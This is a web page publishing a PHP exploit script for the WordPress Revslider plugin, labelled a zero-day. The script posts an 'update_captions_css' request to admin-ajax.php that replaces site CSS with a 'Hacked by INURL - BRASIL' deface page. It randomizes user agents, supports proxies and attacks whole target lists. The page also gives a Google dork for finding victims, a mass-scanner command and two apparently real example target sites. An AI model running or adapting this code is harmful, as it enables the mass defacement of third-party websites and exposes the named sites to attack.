facebook facebook twitter rss

WORDPRESS Revslider Exploit (0DAY)

Author: Cleiton Pinheiro , Published: 26-03-2015
<?php
/*
# AUTOR: Cleiton Pinheiro / Nick: googleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl/
# YOUTUBE https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA

# Exploit Title: WORDPRESS Revslider Exploit (0DAY)
# Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
# EXECUTE:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'


# USE MASS EXPLOIT SCANNER INURLBR
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt -q 1,6 --command-all 'php inurl_revslider.php -t _TARGET_'

# SCAN: https://github.com/googleinurl/SCANNER-INURLBR
# PRINT: http://i.imgur.com/Fown6vf.png

# Exemples target:
http://victorylakeland.org/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
http://ndcom.ru/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css


*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\n\n";
$menu = "
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php exploit.php -t target
php exploit.php -f targets
php exploit.php -t target -p 'http://localhost:9090'
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array(
'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by INURL - BRASIL ]<br><marque>blog.inurl.com.br<p style='color: transparent'>",
'line' => "--------------------------------------------------------------"
);
not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;

function not_isnull_empty($valor = NULL) {
RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

function __plus() {

ob_flush();
flush();
}

function __listTarget($file) {
$tgt = file_get_contents($file['file']) . __plus();
$tgt_ = explode("\r\n", $tgt) . __plus();
echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
foreach ($tgt_ as $url) {
echo "\n[+] [INFO] SCANNING : {$url} \n";
__plus();
$file['target'] = $url;
__request($file) . __plus();
}
}

function __setUserAgentRandom() {

$agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
);

$agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
);

$locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
);
return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
}

function __request($__) {
$curlxpl = curl_init();
curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
(!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
curl_setopt($curlxpl, CURLOPT_POST, 1);
curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
$result = curl_exec($curlxpl) . __plus();
if (eregi('true', $result)) {
$h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
echo "[!] [INFO] Success Exploit!\n";
echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
__plus();
file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
} else {
echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
}
curl_close($curlxpl);
unset($curlxpl);
}

Like us on Facebook :